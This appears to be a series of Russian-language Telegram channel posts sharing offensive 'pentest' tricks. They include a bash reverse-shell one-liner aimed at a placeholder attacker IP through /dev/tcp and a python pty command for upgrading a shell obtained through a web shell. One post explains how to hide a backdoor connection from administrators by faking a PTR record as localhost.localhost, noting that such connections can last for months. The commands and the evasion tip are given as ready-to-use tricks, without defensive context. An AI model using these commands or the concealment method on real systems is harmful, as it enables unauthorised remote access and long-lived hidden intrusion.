⭐️ Данный метод должен знать каждый уважающий себя безопасник.

Когда на серваке нет nc и залить ничего нельзя, а очень нужен бэкконнект, то на помощь приходит подсистема /dev:

bash -i >& /dev/tcp/<hacker-ip>/<port> 0>&1

(c) @offsec

#backconnect #pentest #hacks

Когда сделал бэкконнект через веб-шелл на свой сервер и хочется интерактивного шелла:

python -c 'import pty; pty.spawn("/bin/sh")'

и можно развлекаться по полной :)

(c) @offsec

#tty #webshell #python #backconnect #hacks

Как без лишних заморочек замаскировать свой бэкконнект от невнимательного администратора:

в PTR-записи прописать localhost.localhost , что позволит при выводе команд (lsof -i tcp/netstat -alt/ss -pnt) замаскировать коннект в виде - hostname.localdomain->localhost.localhost:https (ESTABLISHED). На практике такие подключения могут жить месяцами, а то и больше.

Отдельное спасибо Никсу за такой топовый совет👍

#hacks #backconnect #masquerade #pentest

Хочу дополнить список трюков в post-exploitation. Хотя можно применить и в повседневной жизни тоже

http://telegra.ph/Butterfly--instant-shell-02-02

#perks #hacks #python #butterfly #backconnect